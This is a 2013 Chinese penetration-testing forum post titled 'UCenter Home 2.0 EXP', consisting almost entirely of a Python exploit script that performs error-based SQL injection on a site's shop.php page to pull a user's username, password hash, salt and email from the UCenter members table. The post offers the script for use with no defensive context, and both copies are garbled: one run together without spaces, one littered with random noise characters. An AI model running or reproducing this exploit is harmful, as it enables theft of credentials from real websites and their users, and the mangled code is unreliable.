找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1965|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl' c. `6 W* |" G* J" }
" y  r7 V: z( g9 C. @
' r: y, u4 v8 B) s& K
#!/usr/bin/env python  $ A, A4 ?! t0 V7 d7 ~) k0 F; K/ t
* y5 J, D; s1 b, g/ `& q4 F
import sys  . B. N( B( }1 y9 c6 F( `, {
import urllib2  
3 i7 J- g# V% y. U" P  Simport re  
- w( m2 t4 h$ w) s, d5 m
$ t& w% K0 @" Z4 d( H$ Idef info():  8 G% Y/ _, Y+ S2 b$ W0 l
    print 'From:http://www.exploit-db.com/exploits/14997/'
+ _: E" K) U' s8 n! q: I4 a    print 'http://www.hake.cc/Web_loudong/'
' l& r. N" R. V6 B5 v    print 'changed:qiaoy'  ( ?  V' [+ V: r7 N4 D) R! X7 d
    print 'exp:'  
9 C" u. n, {( C    print ' ./UCenter_Home_2.0.py site'  8 V# Q, I' P4 C5 q. d$ _! @

: Q: T& c" h6 Z; a3 U8 ^- Edef main():  
9 N# \+ o4 O" V) \% `# A8 y    if len(sys.argv) != 2:  
) x( f3 U# P" c# L7 X8 @        info()  
5 Z1 S; u9 I' O2 ^! t0 ]    else:  
8 c' G, S# j$ m4 k5 K+ ^6 X3 g8 E        site = sys.argv[1]  
& Z# |5 u! ?& x; `# o2 b7 v" c        if site[0:7] == 'http://':  
* s8 w! v8 o) @+ k4 V            sitesite =site  
3 K* W2 s; d' I( }0 m" [$ x' W        elif site[0:8] == 'https://':  
( k0 n) b. D+ z! G$ {2 ?1 L            sitesite = site  
6 X4 |+ A2 g7 H8 R% A        else:  
( m8 n, F, U6 H6 x            site = 'http://'+site  ' J6 O. B/ l: G) d5 z  g
        try:  
/ h: W8 e9 X6 p3 ^1 _            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
7 \& d# A7 G# [! q8 _( I& x1 d* P2 o% |            Value = urllib2.urlopen(url).read()  3 \5 B8 Y2 @1 s3 W% @
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
! e/ a4 S# p. W' c5 B8 M6 [# g            hacked = Msg.split(':')  3 |5 O4 G+ W' Q8 k
            print 'Name:    '+hacked[1]  
$ j5 P3 g2 B! T  P9 i( n3 h! I0 \5 w            print 'Passwd:  '+hacked[2]  
1 s0 s  k3 u6 |9 ~5 c( r! H            print 'salt:    '+hacked[3]  
. q& Q* M  {" A8 f4 t            print 'email:   '+hacked[4]  
3 d: u$ ?' `: c2 i& [        except:  1 s. f/ j1 x+ Q1 q0 J& \
            print 'Sorry,I can\'t work............'  8 u8 }9 @" f8 i$ L8 d0 L- C. ?1 `

% S/ w* p& d* G* u0 [; u) |if __name__ == '__main__':  + ]& W% x( l) D6 ?2 O
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表